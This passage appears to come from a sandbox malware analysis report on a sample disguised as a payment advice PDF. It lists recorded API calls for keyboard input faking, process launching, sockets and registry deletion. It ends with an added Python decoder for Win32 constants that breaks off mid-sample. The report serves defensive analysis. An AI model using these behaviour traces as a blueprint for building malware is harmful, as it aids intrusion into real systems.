• Opcode Fuzzy Hash: 6994b0cd5946f6e740c7079bf6eade0788e43f57191c1c8b9af8dee726030d81
• Instruction Fuzzy Hash: FC316D71900205EBDB00DFA8DC85EAFB7B9FF45310F1541B6E904EB246DB309A10DBA5
APIs
• DeleteObject.GDI32(00000000), ref: 008C61EB
• GetDC.USER32(00000000), ref: 008C61F3
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 008C61FE
• ReleaseDC.USER32(00000000,00000000), ref: 008C620A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008C6246
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008C6257
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008C902A,?,?,000000FF,00000000,?,000000FF,?), ref: 008C6291
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008C62B1
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 846d98c0744300fd09cd0205d0aa4ab27074b98e403d0f1572dbff28d5707a72
• Instruction ID: 7a6f2972e7c8832c058643a5dc35476f0b9e783e271122461470214f0c406719
• Opcode Fuzzy Hash: 846d98c0744300fd09cd0205d0aa4ab27074b98e403d0f1572dbff28d5707a72
• Instruction Fuzzy Hash: 54316B72201210BFEB118F50CC8AFEA3BBAFF59765F044065FE08DA292D6759C51CB60
APIs
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 6c99e431ef91f1a875fa1c4943b3ae6fbdd243d538656a33c290cd6673e7b8f3
• Instruction ID: 9322ea56e5edc999ac32b339ae25ae3342f759ed7a250620ecf9d784520e7c1d
• Opcode Fuzzy Hash: 6c99e431ef91f1a875fa1c4943b3ae6fbdd243d538656a33c290cd6673e7b8f3
• Instruction Fuzzy Hash: A52171A16012097BAE047615AE42FBB735EFF6039CF0C4011FD04DA787EF58DE1182A6
APIs
  • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
  • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
  • Part of subcall function 0085FC86: _wcscpy.LIBCMT ref: 0085FCA9
• _wcstok.LIBCMT ref: 008AEC94
• _wcscpy.LIBCMT ref: 008AED23
• _memset.LIBCMT ref: 008AED56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: f0777f84d131a121e10349bcb8a33ad07ab50d924922ad4b136f44b37ff7b345
• Instruction ID: afcc0c18171c25c1be81f139e314e60680104f95312e8088451eb2bc44ff1931
• Opcode Fuzzy Hash: f0777f84d131a121e10349bcb8a33ad07ab50d924922ad4b136f44b37ff7b345
• Instruction Fuzzy Hash: 13C149716087149FD764EF28C885A6AB7E4FF85310F00492DF999DB6A2DB70E845CB83
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 008B6C00
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008B6C21
• WSAGetLastError.WSOCK32(00000000), ref: 008B6C34
• htons.WSOCK32(?,?,?,00000000,?), ref: 008B6CEA
• inet_ntoa.WSOCK32(?), ref: 008B6CA7
  • Part of subcall function 0089A7E9: _strlen.LIBCMT ref: 0089A7F3
  • Part of subcall function 0089A7E9: _memmove.LIBCMT ref: 0089A815
• _strlen.LIBCMT ref: 008B6D44
• _memmove.LIBCMT ref: 008B6DAD
Memory Dump Source
• Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
Similarity
• API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
• String ID:
• API String ID: 3619996494-0
• Opcode ID: d468c889455f327136e15021b5562e812f7a47faa36fcecd8b7fe4431111604e
• Instruction ID: 19e24d58fab839a4681b25f5c77c7da48694cd53fdf82ba18f9b93e7454a3625
• Opcode Fuzzy Hash: d468c889455f327136e15021b5562e812f7a47faa36fcecd8b7fe4431111604e
• Instruction Fuzzy Hash: A981C071204204ABD720EB28CC82EAFB7A9FF84724F14491DF555DB292EB75ED14CB52
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd5ca9fe9372c5e593452f22ba8bd45ae23d6b4c6cc3cb3b6835a0c920eee135
                                                              • Instruction ID: b30decd15277d26c96647260bae9d1096e74d99c5fa7cf9caafe9090b104fc17
                                                              • Opcode Fuzzy Hash: cd5ca9fe9372c5e593452f22ba8bd45ae23d6b4c6cc3cb3b6835a0c920eee135
                                                              • Instruction Fuzzy Hash: 7C71493090010DEFDF05CF98CC89AAEBB7AFF85354F148159F915EA251C734AA91CBA4
                                                              APIs
                                                              • IsWindow.USER32(01624EE8), ref: 008CB3EB
                                                              • IsWindowEnabled.USER32(01624EE8), ref: 008CB3F7
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 008CB4DB
                                                              • SendMessageW.USER32(01624EE8,000000B0,?,?), ref: 008CB512
                                                              • IsDlgButtonChecked.USER32(?,?), ref: 008CB54F
                                                              • GetWindowLongW.USER32(01624EE8,000000EC), ref: 008CB571
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008CB589
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                              • String ID:
                                                              • API String ID: 4072528602-0
                                                              • Opcode ID: 32c9580f424b209a8312dbe3c038923349bbc6943fc01a37112c3a8c1a05545e
                                                              • Instruction ID: 556d47dd2f1338704051f7461d7c149c0b8b5466d5e5051a610dc36b83394911
                                                              • Opcode Fuzzy Hash: 32c9580f424b209a8312dbe3c038923349bbc6943fc01a37112c3a8c1a05545e
                                                              • Instruction Fuzzy Hash: 37718E34608A44EFEB249F64C896FAA7BBAFF09300F14415DEA45D73A2C731E940DB54
                                                              APIs
                                                              • _memset.LIBCMT ref: 008BF448
                                                              • _memset.LIBCMT ref: 008BF511
                                                              • ShellExecuteExW.SHELL32(?), ref: 008BF556
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                                • Part of subcall function 0085FC86: _wcscpy.LIBCMT ref: 0085FCA9
                                                              • GetProcessId.KERNEL32(00000000), ref: 008BF5CD
                                                              • CloseHandle.KERNEL32(00000000), ref: 008BF5FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                              • String ID: @
                                                              • API String ID: 3522835683-2766056989
                                                              • Opcode ID: 29e3a780931f5a2533138718993f590acb52df6b7ec91a90063d678b19df93ac
                                                              • Instruction ID: 644b5ccb02dd8922936d536057994fdb705eb8a54fe3d231bc392ff89cf8c7f2
                                                              • Opcode Fuzzy Hash: 29e3a780931f5a2533138718993f590acb52df6b7ec91a90063d678b19df93ac
                                                              • Instruction Fuzzy Hash: 7761BD75A00619DFCB24EF68C8819AEBBF5FF48310F148069E959EB352CB31AD41CB85
                                                              APIs
                                                              • GetParent.USER32(?), ref: 008A0F8C
                                                              • GetKeyboardState.USER32(?), ref: 008A0FA1
                                                              • SetKeyboardState.USER32(?), ref: 008A1002
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 008A1030
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 008A104F
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 008A1095
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008A10B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 06e23ab80df4c2008be2a3dcaa58fe347716abbce3c1b41fab7bc1542a38ec1d
                                                              • Instruction ID: 6aae1ffd48a561ad07bb3b8fef9cd121c0d192a2dba6bf6518fc512a0a414b36
                                                              • Opcode Fuzzy Hash: 06e23ab80df4c2008be2a3dcaa58fe347716abbce3c1b41fab7bc1542a38ec1d
                                                              • Instruction Fuzzy Hash: 9B51C160604AD53DFF3642388C19BB6BEA9BB07304F088589E2D5D5CD3C6A9ECD4DB51
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 008A0DA5
                                                              • GetKeyboardState.USER32(?), ref: 008A0DBA
                                                              • SetKeyboardState.USER32(?), ref: 008A0E1B
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008A0E47
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008A0E64
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008A0EA8
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008A0EC9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 740038ffb7e086bb575363a3f053e5c2c382cc595c03efcf9e5aa6a9f673ed31
                                                              • Instruction ID: 7fb36715509f236b732de165d65c321562aaf7280abef0974d4db3c24af4462e
                                                              • Opcode Fuzzy Hash: 740038ffb7e086bb575363a3f053e5c2c382cc595c03efcf9e5aa6a9f673ed31
                                                              • Instruction Fuzzy Hash: 5F51E4A15486D53DFB3283648C45B7A7EA9FB07300F088989E2D4D6CC2D795ECA8EB51
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _wcsncpy$LocalTime
                                                              • String ID:
                                                              • API String ID: 2945705084-0
                                                              • Opcode ID: ed4ab9581b57f7f8f7fa57116fce4528846869ad9010d2aa02176884c4a3064c
                                                              • Instruction ID: a7ca46fd6604856cffdb533441930c7af13d205cc6363b2397b7a02632643800
                                                              • Opcode Fuzzy Hash: ed4ab9581b57f7f8f7fa57116fce4528846869ad9010d2aa02176884c4a3064c
                                                              • Instruction Fuzzy Hash: 7341D865C10628B6DB11EBB88C86ACFB3B8FF05310F514456E515E3161FB34A285C7A7
                                                              APIs
                                                                • Part of subcall function 008A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008A3697,?), ref: 008A468B
                                                                • Part of subcall function 008A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008A3697,?), ref: 008A46A4
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 008A36B7
                                                              • _wcscmp.LIBCMT ref: 008A36D3
                                                              • MoveFileW.KERNEL32(?,?), ref: 008A36EB
                                                              • _wcscat.LIBCMT ref: 008A3733
                                                              • SHFileOperationW.SHELL32(?), ref: 008A379F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                              • String ID: \*.*
                                                              • API String ID: 1377345388-1173974218
                                                              • Opcode ID: eb08e3f83e58ecba7fd28744ab2823cb4516b9853bf33be234f725abd3ccc2ae
                                                              • Instruction ID: b6b472e29210a590deeedcbc8417ec862a3779f88f97d4a435f30d0f1c8ef4f9
                                                              • Opcode Fuzzy Hash: eb08e3f83e58ecba7fd28744ab2823cb4516b9853bf33be234f725abd3ccc2ae
                                                              • Instruction Fuzzy Hash: 98419F71508344AEE752EF68C4419DFB7E8FF8A380F40086EB49AC3651EA74D689C752
                                                              APIs
                                                              • _memset.LIBCMT ref: 008C72AA
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008C7351
                                                              • IsMenu.USER32(?), ref: 008C7369
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008C73B1
                                                              • DrawMenuBar.USER32 ref: 008C73C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                              • String ID: 0
                                                              • API String ID: 3866635326-4108050209
                                                              • Opcode ID: e4c49e6afee7f362225a8f2292b591f332b7237a6a2fe98c899c4d46154d3128
                                                              • Instruction ID: a9811cd504de63c82bb01701731545d32926d8f57329a969e2d6af2bec7a74ea
                                                              • Opcode Fuzzy Hash: e4c49e6afee7f362225a8f2292b591f332b7237a6a2fe98c899c4d46154d3128
                                                              • Instruction Fuzzy Hash: 61411375A04248AFDB20DF60D884E9ABBB9FB08354F648529FD05AB390D730ED50EF50
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 008C0FD4
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008C0FFE
                                                              • FreeLibrary.KERNEL32(00000000), ref: 008C10B5
                                                                • Part of subcall function 008C0FA5: RegCloseKey.ADVAPI32(?), ref: 008C101B
                                                                • Part of subcall function 008C0FA5: FreeLibrary.KERNEL32(?), ref: 008C106D
                                                                • Part of subcall function 008C0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 008C1090
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 008C1058
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 0f03feed0c440f07c0a7f8f05a0926bd36c072a391ed9662f52c3848cfd4af9b
                                                              • Instruction ID: b509d6d2b44e72a20b8d5b0f83e15c2da91e95158e6986d4972d728ee4c0da98
                                                              • Opcode Fuzzy Hash: 0f03feed0c440f07c0a7f8f05a0926bd36c072a391ed9662f52c3848cfd4af9b
                                                              • Instruction Fuzzy Hash: FB310771900509EFEB159B94DC89EFEB7BCFB09340F00416AE611E2142EB749E899AA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008C62EC
                                                              • GetWindowLongW.USER32(01624EE8,000000F0), ref: 008C631F
                                                              • GetWindowLongW.USER32(01624EE8,000000F0), ref: 008C6354
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008C6386
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008C63B0
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 008C63C1
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008C63DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend
                                                              • String ID:
                                                              • API String ID: 2178440468-0
                                                              • Opcode ID: 003d63e8ba2d242b3014c5e16403aad5c9d5a04109608dfc4e1a0bb9948e45e5
                                                              • Instruction ID: f959f3818003f96eed644192aa1a387801d9ab033e077b4a40ef6c9a62803498
                                                              • Opcode Fuzzy Hash: 003d63e8ba2d242b3014c5e16403aad5c9d5a04109608dfc4e1a0bb9948e45e5
                                                              • Instruction Fuzzy Hash: 8231CC30648291AFEB208F28D884F5937B1FB5A714F1941B8FA01DB2B2DA71E850EB51
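The call records in this section are easier to read once the raw immediates are resolved to the Win32 constants they encode: the two PostMessageW routines above post WM_KEYDOWN (0x100) and WM_KEYUP (0x101) for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, the SendMessageW(?,000000A1,00000002,...) call is WM_NCLBUTTONDOWN with HTCAPTION, the 0xF0/0xF1 messages are BM_GETCHECK/BM_SETCHECK, and 8004667E passed to ioctlsocket is FIONBIO. The following is an added example, not part of the Joe Sandbox report or its IDA plugin: a small Python parser for the `• Api.MODULE(args), ref: ADDR` line format used in these "APIs" lists that annotates known constants. The sample input is a handful of lines copied from this section and is labelled as constructed in the code. The constant tables come from the public Windows SDK headers; reading the GetWindowLongW index values 000000F0 and 000000EC as the sign-extended byte forms of GWL_STYLE (-16) and GWL_EXSTYLE (-20) is this example's interpretation of how the plugin prints negative immediates, not something the report states.

```python
"""Decode the 'APIs' call records from a Joe Sandbox IDA-plugin section.

Added example (not report or plugin code). Parses lines of the form
  • Api.MODULE(arg,arg,...), ref: ADDR
  • Part of subcall function ADDR: Api.MODULE ref: ADDR
and replaces raw hex arguments with the Win32 constant names they encode,
so a call sequence can be read as behaviour rather than as numbers.
"""
import re
from dataclasses import dataclass
from typing import Optional

CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 constants that occur in the records (values from the public SDK headers).
WM = {0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP", 0xA1: "WM_NCLBUTTONDOWN",
      0xB0: "EM_GETSEL", 0xF0: "BM_GETCHECK", 0xF1: "BM_SETCHECK"}
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
HT = {0x2: "HTCAPTION"}
# GetWindowLong indices are negative; this table assumes the plugin prints the
# sign-extended 8-bit immediate, so -16 shows as 0xF0 and -20 as 0xEC.
GWL = {0xF0: "GWL_STYLE", 0xEC: "GWL_EXSTYLE"}
IOCTL = {0x8004667E: "FIONBIO"}
AF = {2: "AF_INET"}
SOCK = {1: "SOCK_STREAM"}
PROTO = {6: "IPPROTO_TCP"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                  # raw argument strings; '?' when unresolved
    ref: str                    # address of the call site
    subcall_of: Optional[str] = None


def parse_calls(text: str) -> list:
    """Extract every call record from a block of report text."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


def _hex(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:          # '?' placeholder or other non-hex text
        return None


def _name(table: dict, arg: str) -> str:
    v = _hex(arg)
    return table.get(v, arg) if v is not None else arg


def decode_args(call: ApiCall) -> list:
    """Return the argument list with known constants replaced by their names."""
    out = list(call.args)
    api = call.api
    if api in ("PostMessageW", "SendMessageW") and len(out) >= 2:
        msg = _hex(out[1])
        out[1] = _name(WM, out[1])
        if msg in (0x100, 0x101) and len(out) >= 3:     # wParam is a virtual key
            out[2] = _name(VK, out[2])
        elif msg == 0xA1 and len(out) >= 3:             # wParam is a hit-test code
            out[2] = _name(HT, out[2])
    elif api in ("GetWindowLongW", "SetWindowLongW") and len(out) >= 2:
        out[1] = _name(GWL, out[1])
    elif api == "ioctlsocket" and len(out) >= 2:
        out[1] = _name(IOCTL, out[1])
    elif api == "socket" and len(out) >= 3:
        out[0], out[1], out[2] = _name(AF, out[0]), _name(SOCK, out[1]), _name(PROTO, out[2])
    return out


def render(call: ApiCall) -> str:
    """One readable line per call: address, optional subcall origin, decoded args."""
    prefix = f"[via {call.subcall_of}] " if call.subcall_of else ""
    return f"{call.ref} {prefix}{call.api}({', '.join(decode_args(call))})"


# Constructed sample: call records copied from the report section above.
SAMPLE = """\
• GetParent.USER32(00000000), ref: 008A0DA5
• GetKeyboardState.USER32(?), ref: 008A0DBA
• SetKeyboardState.USER32(?), ref: 008A0E1B
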